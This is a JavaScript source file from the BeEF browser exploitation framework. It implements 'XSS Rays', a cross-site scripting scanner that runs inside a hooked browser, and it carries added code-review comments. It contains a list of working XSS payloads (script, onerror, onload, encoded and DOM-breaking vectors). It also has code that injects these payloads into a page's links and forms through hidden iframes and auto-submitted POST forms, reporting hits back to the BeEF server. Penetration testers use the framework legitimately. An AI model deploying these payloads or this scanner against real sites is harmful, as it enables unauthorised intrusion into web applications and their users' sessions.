beefproject
GitHub Repository: beefproject/beef
Path: blob/master/core/main/client/net/xssrays.js
/*
* XSS Rays
* Legal bit:
* Do not remove this notice.
* Copyright (c) 2009 by Gareth Heyes
* Programmed for Microsoft
* gareth --at-- businessinfo -dot- co |dot| uk
* Version 0.5.5
*
* This license governs use of the accompanying software. If you use the software, you
* accept this license. If you do not accept the license, do not use the software.
* 1. Definitions
* The terms "reproduce," "reproduction," "derivative works," and "distribution" have the
* same meaning here as under U.S. copyright law.
* A "contribution" is the original software, or any additions or changes to the software.
* A "contributor" is any person that distributes its contribution under this license.
* "Licensed patents" are a contributor's patent claims that read directly on its contribution.
* 2. Grant of Rights
* (A) Copyright Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution or any derivative works that you create.
* (B) Patent Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution in the software or derivative works of the contribution in the software.
* 3. Conditions and Limitations
* (A) No Trademark License- This license does not grant you rights to use any contributors' name, logo, or trademarks.
* (B) If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your patent license from such contributor to the software ends automatically.
* (C) If you distribute any portion of the software, you must retain all copyright, patent, trademark, and attribution notices that are present in the software.
* (D) If you distribute any portion of the software in source code form, you may do so only under this license by including a complete copy of this license with your distribution. If you distribute any portion of the software in compiled or object code form, you may only do so under a license that complies with this license.
* (E) The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, guarantees or conditions. You may have additional consumer rights under your local laws which this license cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties of merchantability, fitness for a particular purpose and non-infringement.
*/

/**
* XssRays 0.5.5 ported to BeEF by Michele "antisnatchor" Orru'
* The XSS detection mechanism has been rewritten from scratch: instead of using the location hash trick (which no longer works),
* the injected JS code contacts BeEF back when the vulnerability is triggered.
* Other aspects of the original code have been simplified and improved.
* @namespace beef.net.xssrays
*/
beef.net.xssrays = {
    // name of the BeEF handler appended to the BeEF URL in startScan()
    handler: "xssrays",
    // jobs taken off the stack so far (incremented in getNextJob)
    completed:0,
    // number of jobs that were on the stack when runJobs() started
    totalConnections:0,

    // BeEF variables
    xssraysScanId : 0,
    hookedBrowserSession: "",
    beefRayUrl: "",
    // the following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
    crossDomain: false,
    cleanUpTimeout:5000,

    //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
    // Each entry has: input (payload template; every literal "XSS" in it is substituted by run()),
    // name (label reported back to BeEF and printed in debug output), browser (filter applied by
    // checkBrowser), and the url/form/path flags that xss() consults to decide which injection
    // points the entry is queued for.
    vectors: [

        {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
        {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
        {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
        {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
        {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
        {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
        {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
        {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
        {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
        {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
        {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
        {input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
    ],
    // per-job counter; incremented before use, so rays[0] is never written and the
    // iframe ids start at "ray1"
    uniqueID: 0,
    // sparse array indexed by uniqueID; each entry is {vector, url, params} and is
    // later annotated with vector.poc / vector.method by the job that created it
    rays: [],
    // FIFO of job closures pushed by run() and consumed by getNextJob()
    stack: [],

    /**
    * Returns true if the vector at the given index may be used against the hooked browser:
    * 'ALL' always matches, 'FF'/'IE'/'C'/'S'/'O' defer to the matching beef.browser.isXX()
    * probe, and any other value yields false.
    * @param {number} vector_array_index - index into this.vectors
    * @returns {boolean}
    */
    checkBrowser:function(vector_array_index){
        var result = false;
        var browser_id = this.vectors[vector_array_index].browser;
        switch (browser_id){
            case "ALL":
                result = true;
                break;
            case "FF":
                if(beef.browser.isFF())result=true;
                break;
            case "IE":
                if(beef.browser.isIE())result=true;
                break;
            case "C":
                if(beef.browser.isC())result=true;
                break;
            case "S":
                if(beef.browser.isS())result=true;
                break;
            case "O":
                if(beef.browser.isO())result=true;
                break;
            default : result = false;
        }
        beef.debug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
        return result;
    },

    /**
    * Entry point: stores the scan settings, queues all jobs via scan() and starts
    * dispatching them via runJobs().
    * @param {number} xssraysScanId - scan identifier echoed back to BeEF in every callback
    * @param {string} hookedBrowserSession - hooked browser session token echoed back to BeEF
    * @param {string} beefUrl - base URL of BeEF; this.handler is appended to build beefRayUrl
    * @param {boolean} crossDomain - when true, links/forms on other hosts are scanned too
    * @param {number} timeout - period (ms) of the iframe clean-up interval in runJobs()
    */
    startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout) {

        this.xssraysScanId = xssraysScanId;
        this.hookedBrowserSession = hookedBrowserSession;
        this.beefRayUrl = beefUrl + '/' + this.handler;
        beef.debug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
        this.crossDomain = crossDomain;
        this.cleanUpTimeout = timeout;

        // scan() only fills the stack; nothing is executed until runJobs()
        this.scan();
        beef.debug("Starting scan");
        this.runJobs();
    },
    /**
    * Called by getNextJob() when the stack is empty and by the clean-up interval in
    * runJobs() for every stale ray iframe. Once every queued job has been dispatched
    * (completed == totalConnections) BeEF is notified with action=finish; otherwise the
    * next job is dispatched.
    * NOTE(review): because the clean-up interval calls this once per removed iframe, the
    * "finish" request can be sent more than once — confirm the server-side handler
    * tolerates duplicates.
    */
    complete:function() {
        if (beef.net.xssrays.completed == beef.net.xssrays.totalConnections) {
            beef.debug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
            // $j is presumably BeEF's jQuery alias (defined outside this file)
            $j.get(this.beefRayUrl, { hbsess: this.hookedBrowserSession, raysid: this.xssraysScanId, action: "finish"} );
        } else {
            this.getNextJob();
        }
    },
    /**
    * Shifts the next job closure off the stack, counts it in `completed` and runs it with
    * `this` bound to the xssrays object; with an empty stack it defers to complete().
    */
    getNextJob:function() {
        var that = this;
        beef.debug("getNextJob - this.stack.length [" + this.stack.length + "]");
        if (this.stack.length > 0) {
            var func = that.stack.shift();
            if (func) {
                that.completed++;
                func.call(that);
            }
        }else{ //nothing else to scan
            this.complete();
        }
    },
    /**
    * Queues the link and form jobs. scanPaths() is not invoked from here.
    */
    scan:function() {
        this.scanLinks();
        this.scanForms();
    },
    /**
    * Queues a job of type 'path'. Note that xss() has no 'path' case in its switch, so
    * this currently queues nothing; it is also not called by scan().
    * @returns {beef.net.xssrays} this, for chaining
    */
    scanPaths:function() {
        this.xss({type:'path'});
        return this;
    },
    /**
    * Queues jobs for every form in the document (see the 'form' case of xss()).
    * @returns {beef.net.xssrays} this, for chaining
    */
    scanForms: function() {
        this.xss({type:'form'});
        return this;
    },
    /**
    * Queues a 'url' job for every link in document.links whose hostname matches the page
    * (or for every link when crossDomain is set), provided the page itself is served over
    * http(s). Afterwards the page's own query string, if any, is queued as well.
    * NOTE(review): the trailing block reuses the loop variable `url` — i.e. the LAST link —
    * for hostname and port, so it throws when the page has no links and may pass a port that
    * is not the page's own; location.hostname / location.port look like the intended values.
    * @returns {beef.net.xssrays} this, for chaining
    */
    scanLinks: function() { //TODO: add depth crawling for links that are in the same domain
        beef.debug("scanLinks, document.links.length [" + document.links.length + "]");
        for (var i = 0; i < document.links.length; i++) {
            var url = document.links[i];

            if ((url.hostname.toString() === location.hostname.toString() || this.crossDomain) && (location.protocol === 'http:' || location.protocol === 'https:')) {
                beef.debug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
                    "\n url.pathname => " + url.pathname + "\n" +
                    "url.search => " + url.search + "\n");
                this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
                    search:url.search, type: 'url'});//scan each link & param
            } else {
                beef.debug('Scan is not Cross-origin. URLS\nurl :' + url.hostname.toString());
                beef.debug('\nlocation :' + location.hostname.toString());
            }
        }
        if (location.search.length > 0) {
            this.xss({pathname:location.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,search:location.search, type: 'url'});//scan originating url
        }
        return this;
    },
    /**
    * Expands one target into run() jobs, one per compatible vector and injection point.
    *
    * type 'url': only targets with a non-empty query string are considered. The query is
    * split into a params map, then for each vector that passes checkBrowser(): a GET job
    * with the params (vector.url) and a GET job with params === null, i.e. a URI-path
    * injection (vector.path). The port is only included in the URL when present.
    *
    * type 'form': for each document.forms entry the action (falling back to
    * document.location) and method are read and the element name/value pairs collected
    * into a params map (empty values become 1). Forms whose host differs from the page
    * are skipped unless crossDomain is set. Then per compatible vector: a GET or POST job
    * with the params (vector.form; only GET jobs are url-encoded) and a GET path job
    * (vector.path).
    *
    * NOTE(review): `params` in the form case is shared across all forms — it is declared
    * once outside the loop, so later forms accumulate the fields of earlier ones; and the
    * "Skipping vector" debug line indexes this.vectors with the form index `i` instead of
    * the vector index `k`.
    * @param {Object} target - {type: 'url', href, pathname, hostname, port, protocol, search}
    *        or {type: 'form'}
    */
    xss:function(target) {
        switch (target.type) {
            case "url":
                if (target.search.length > 0) {
                    // drop the leading '?' and split on '&' or its HTML-escaped form
                    target.search = target.search.slice(1);
                    target.search = target.search.split(/&|&amp;/);

                    if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
                        var pathname = "/" + target.pathname;
                    }else{
                        var pathname = target.pathname;
                    }

                    // params: name -> value; a pair without '=' yields an undefined value
                    var params = {};
                    for (var i = 0; i < target.search.length; i++) {
                        target.search[i] = target.search[i].split('=');
                        params[target.search[i][0]] = target.search[i][1];
                    }
                    for (var i = 0; i < this.vectors.length; i++) {
                        // skip the current vector if it's not compatible with the hooked browser
                        if (!this.checkBrowser(i)){
                            beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
                            continue;
                        }
                        if (!this.vectors[i].url) {
                            continue;
                        }
                        // always true here because of the `continue` just above
                        if (this.vectors[i].url) {
                            if (target.port == null || target.port == "") {
                                beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
                            } else {
                                beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
                            }
                        }
                        // params === null selects the URI-path branch inside run()
                        if (this.vectors[i].path) {
                            if (target.port == null || target.port == "") {
                                beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
                            } else {
                                beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
                            }
                        }
                    }
                }
                break;
            case "form":
                var params = {};
                // paramsstring is only ever printed in debug output and is never filled in
                var paramsstring = "";
                for (var i = 0; i < document.forms.length; i++) {
                    var action = document.forms[i].action || document.location;
                    var method = document.forms[i].method.toUpperCase() === 'POST' ?
                        'POST' :
                        'GET';

                    for (var j = 0; j < document.forms[i].elements.length; j++) {
                        params[document.forms[i].elements[j].name] = document.forms[i].elements[j].value || 1;
                    }
                    for (var k = 0; k < this.vectors.length; k++) {

                        // skip the current vector if it's not compatible with the hooked browser
                        if (!this.checkBrowser(k)){
                            // NOTE(review): should be this.vectors[k].name; `i` is the form index
                            beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
                            continue;
                        }
                        if (!this.vectors[k].form) {
                            continue;
                        }
                        // host() may return a match array, hence the toString() on both sides
                        if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
                            beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
                            beef.debug('location :' + this.host(location));
                            continue;
                        }
                        // always true here because of the `continue` above
                        if (this.vectors[k].form) {
                            if (method === 'GET') {
                                beef.debug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
                                this.run(action, method, this.vectors[k], params, true);//params
                            }
                            else {
                                beef.debug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
                                this.run(action, method, this.vectors[k], params, false);//params
                            }
                        }
                        if (this.vectors[k].path) {
                            beef.debug("Starting XSS on FORM action URI PATH of [" + action + "], ");
                            this.run(action, 'GET', this.vectors[k], null, true);//paths
                        }
                    }
                }
                break;
        }
    },
    /**
    * Derives the "host" part used for the same-origin comparison in xss():
    *  - absolute http(s) URL: the scheme://host prefix — returned as a RegExp match
    *    array, not a string, so callers stringify it;
    *  - anything starting with a non-alphanumeric, non-slash character, or with a
    *    scheme-like "xyz:" prefix: '';
    *  - otherwise (relative path): the current page's hostname.
    * @param {string|Location} url - stringified via toString()
    * @returns {Array|string}
    */
    host: function(url) {
        var host = url;
        host = /^https?:[\/]{2}[^\/]+/.test(url.toString())
            ? url.toString().match(/^https?:[\/]{2}[^\/]+/)
            : /(?:^[^a-zA-Z0-9\/]|^[a-zA-Z0-9]+[:]+)/.test(url.toString())
                ? ''
                : location.hostname.toString();
        return host;
    },
    /**
    * Matches the part of a URL before the first '?' (the whole string when there is no
    * query). Returns the RegExp match array, or '' when nothing matches; run() passes the
    * result straight into String.prototype.replace, which stringifies the array.
    * @param {string} url
    * @returns {Array|string}
    */
    fileName: function(url) {
        return url.match(/(?:^[^\/]|^https?:[\/]{2}|^[\/]+)[^?]+/) || '';
    },

    /**
    * Percent-encodes only the double quote, ampersand and plus characters.
    * Not referenced anywhere else in this file (run() uses encodeURIComponent).
    * @param {*} str - stringified via toString()
    * @returns {string}
    */
    urlEncode: function(str) {
        str = str.toString();
        str = str.replace(/"/g, '%22');
        str = str.replace(/&/g, '%26');
        str = str.replace(/\+/g, '%2b');
        return str;
    },

    /**
    * Core routine: pushes onto the stack a closure that, when dispatched by getNextJob(),
    * builds the test request for one vector and loads it in a hidden iframe. Every "XSS"
    * placeholder in vector.input is replaced by a JavaScript snippet that, if it executes
    * in the target page, navigates to beefRayUrl with action=ray plus the session, scan
    * id, page URL, vector name and method — that navigation is the detection signal.
    * A proof-of-concept variant with alert(1) is stored in rays[id].vector.poc.
    *
    *  - params != null: each parameter value is replaced by the payload and appended to
    *    the query string (Chrome/Safari get the raw payload because the whole URL is
    *    base64-wrapped into a data: URI below).
    *  - params == null: URI-path injection; the payload is inserted after fileName(url).
    *  - method 'GET': iframe.src is the URL (or a data:text/html;base64 wrapper of it on
    *    Chrome/Safari). method 'POST': a form with one textarea per parameter is written
    *    into the iframe and submitted.
    *
    * NOTE(review): `beefCallback` is assigned without var/let in all three branches and so
    * becomes an implicit global. In the path branch `pocurl` is built from `poc` with
    * `exploit` still '' at that point, so the stored PoC URL does not look right. In the
    * POST branch the parameter name `i` is inserted unescaped into the textarea `name`
    * attribute while action/exploit are escaped. `paramsPos` is counted but never read.
    * @param {string|Location} url - base URL (for POST, also the form action)
    * @param {string} method - 'GET' or 'POST'
    * @param {Object} vector - an entry of this.vectors
    * @param {Object|null} params - name -> value map, or null for URI-path injection
    * @param {boolean} urlencode - apply encodeURIComponent to payloads
    */
    run: function(url, method, vector, params, urlencode) {
        this.stack.push(function() {

            //check if the URL end with / . In this case remove the last /, as it will be added later.
            // this check is needed only when checking for URI path injections
            if(url[url.length - 1] == "/" && params == null){
                // NOTE(review): substring(0, length - 2) drops two characters, not just the trailing slash
                url = url.substring(0, url.length - 2);
                beef.debug("Remove last / from url. New url [" + url + "]");
            }

            beef.net.xssrays.uniqueID++;
            beef.debug('Processing vector [' + vector.name + "], URL [" + url + "]");
            var poc = '';
            var pocurl = url;
            var exploit = '';
            // kept unmodified so the POST form still targets the original URL after the
            // query-string mutations below
            var action = url;


            beef.net.xssrays.rays[beef.net.xssrays.uniqueID] = {vector:vector,url:url,params:params};
            // same object as the entry just stored (getNextJob calls us with this === xssrays)
            var ray = this.rays[beef.net.xssrays.uniqueID];

            var paramsPos = 0;
            if (params != null) {
                /*
                * ++++++++++ check for XSS in URI parameters (GET) ++++++++++
                */
                for (var i in params) {
                    if (params.hasOwnProperty(i)) {

                        if (!/[?]/.test(url)) {
                            url += '?';
                            pocurl += '?';
                        }

                        poc = vector.input.replace(/XSS/g, "alert(1)");
                        pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc) + '&';

                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;

                        // implicit global (no var); session id, scan id and vector name are
                        // concatenated into the JS string without escaping
                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";

                        exploit = vector.input.replace(/XSS/g, beefCallback);

                        if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
                            url += i + '=' + exploit + '&';
                        }else{
                            url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
                        }

                        paramsPos++;
                    }
                }
            } else {
                /*
                * ++++++++++ check for XSS in URI path (GET) ++++++++++
                */
                var filename = beef.net.xssrays.fileName(url);

                poc = vector.input.replace(/XSS/g, "alert(1)");
                // NOTE(review): replaces within `poc` rather than `url`, and `exploit` is still '' here
                pocurl = poc.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');


                beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;

                // implicit global (no var)
                beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";

                exploit = vector.input.replace(/XSS/g, beefCallback);

                //TODO: if the url is something like example.com/?param=1 then a second slash will be added, like example.com//<xss>.
                //TODO: this need to checked and the slash shouldn't be added in this particular case
                url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
            }
            /*
            * ++++++++++ create the iFrame that will contain the attack vector ++++++++++
            */
            if(beef.browser.isIE()){
                // legacy IE accepted a tag string in createElement; fall back to the standard form
                try {
                    var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
                } catch (e) {
                    var iframe = document.createElement('iframe');
                    iframe.name = 'ray' + Math.random().toString();
                }
            }else{
                var iframe = document.createElement('iframe');
                iframe.name = 'ray' + Math.random().toString();
            }
            iframe.style.display = 'none';
            iframe.id = 'ray' + beef.net.xssrays.uniqueID;
            // creation time in seconds; runJobs() removes the iframe once it is older than 5s
            iframe.time = beef.net.xssrays.timestamp();

            if (method === 'GET') {
                if(beef.browser.isC() || beef.browser.isS()){
                    var datauri = btoa(url);
                    iframe.src = "data:text/html;base64," + datauri;
                }else{
                    iframe.src = url;
                }
                document.body.appendChild(iframe);
                beef.debug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
            } else if (method === 'POST') {
                /*
                * ++++++++++ check for XSS in body parameters (POST) ++++++++++
                */
                var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
                poc = '';
                pocurl = action + "?";
                paramsPos = 0;

                beef.debug("Form action [" + action + "]");
                for (var i in params) {
                    if (params.hasOwnProperty(i)) {

                        poc = vector.input.replace(/XSS/g, "alert(1)");
                        poc = poc.replace(/<\/script>/g, "<\/scr\"+\"ipt>");
                        pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc); // + '&';

                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;

                        // implicit global (no var)
                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";

                        // HTML-escaped because it is placed as textarea content; the browser
                        // decodes it again when the form is submitted
                        exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                        // NOTE(review): `i` (the parameter name) is not escaped here
                        form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
                        beef.debug("form param[" + i + "] = " + params[i].toString());

                        paramsPos++;
                    }
                }
                form += '<\/form>';
                document.body.appendChild(iframe);
                beef.debug("Creating form [" + form + "]");
                iframe.contentWindow.document.writeln(form);
                // submit via a fresh form's submit() so a field named "submit" cannot shadow it
                iframe.contentWindow.document.writeln('<script>document.createElement("form").submit.apply(document.forms[0]);<\/script>');
                beef.debug("Submitting form");
            }

        });
    },

    /**
    * run the jobs (run functions added to the stack), and clean the shit (iframes) from the DOM after a timeout value
    *
    * Dispatches the first job immediately, then every cleanUpTimeout ms walks ALL iframes in
    * the document; each one whose `time` is more than 5 seconds old triggers complete()
    * (which dispatches the next job) and is removed. Iframes not created here have no
    * `time`, so the comparison is NaN and they are left alone, but they still count towards
    * numOfConnections.
    * NOTE(review): `clearTimeout(this)` inside the interval callback does not receive the
    * interval id (`this` is not the timer handle there), so the interval is never cleared.
    * The 5-second age threshold is hard-coded and independent of cleanUpTimeout.
    * @returns {beef.net.xssrays} this, for chaining
    */
    runJobs: function() {
        var that = this;
        this.totalConnections = this.stack.length;
        that.getNextJob();
        setInterval(function() {
            var numOfConnections = 0;
            for (var i = 0; i < document.getElementsByTagName('iframe').length; i++) {
                var iframe = document.getElementsByTagName('iframe')[i];
                numOfConnections++;
                //beef.debug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
                if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
                    try{
                        if (iframe) {
                            beef.net.xssrays.complete();
                            beef.debug("RunJobs cleaning up iFrame [" + iframe.id + "]");
                            document.body.removeChild(iframe);
                        }
                    }catch(e){
                        beef.debug("Exception [" + e.toString() + "] when cleaning iframes.")
                    }
                }
            }

            if (numOfConnections == 0) {
                clearTimeout(this);
            }

        }, this.cleanUpTimeout);

        return this;
    },
    /**
    * Current time as a whole number of seconds: the first ten digits of the millisecond
    * epoch value (parseInt without an explicit radix).
    * @returns {number}
    */
    timestamp: function() {
        return parseInt(new Date().getTime().toString().substring(0, 10));
    },
    /**
    * HTML-escapes <, >, double quote, single quote and backslash.
    * @param {*} str - stringified via toString()
    * @returns {string}
    */
    escape: function(str) {
        str = str.toString();
        str = str.replace(/</g, '&lt;');
        str = str.replace(/>/g, '&gt;');
        str = str.replace(/\u0022/g, '&quot;');
        str = str.replace(/\u0027/g, '&#39;');
        str = str.replace(/\\/g, '&#92;');
        return str;
    }

};
// beef.regCmp is defined outside this file — presumably registers this namespace as a BeEF component; verify
beef.regCmp('beef.net.xssrays');